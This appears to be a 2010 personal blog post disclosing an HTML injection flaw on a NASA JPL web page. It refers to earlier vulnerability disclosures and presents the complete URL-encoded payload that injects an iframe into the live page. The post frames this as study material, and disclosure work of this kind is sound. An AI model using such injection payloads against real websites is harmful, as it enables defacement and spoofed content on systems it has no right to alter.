Wednesday, April 28, 2010

HTML Injection in NASA Website

Last February 25, 2010 I made a full disclosure type of post here regarding multiple nasa.gov server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed thanks to the media like CBS News who broke it (together with the NSA defacement) to public in one of their "cyber war" reports involving the China Google hacking incident if my memory serves me right. Anyway, here is the last exploit which is a good example of html injection for those who are interested in studying it further.

http://starbrite.jpl.nasa.gov/pds/viewDataset.jsp?dsid=error%3E%3Ciframe%20src=%22http://www.hackthissite.org%22%20%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E

No comments:

Post a Comment

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security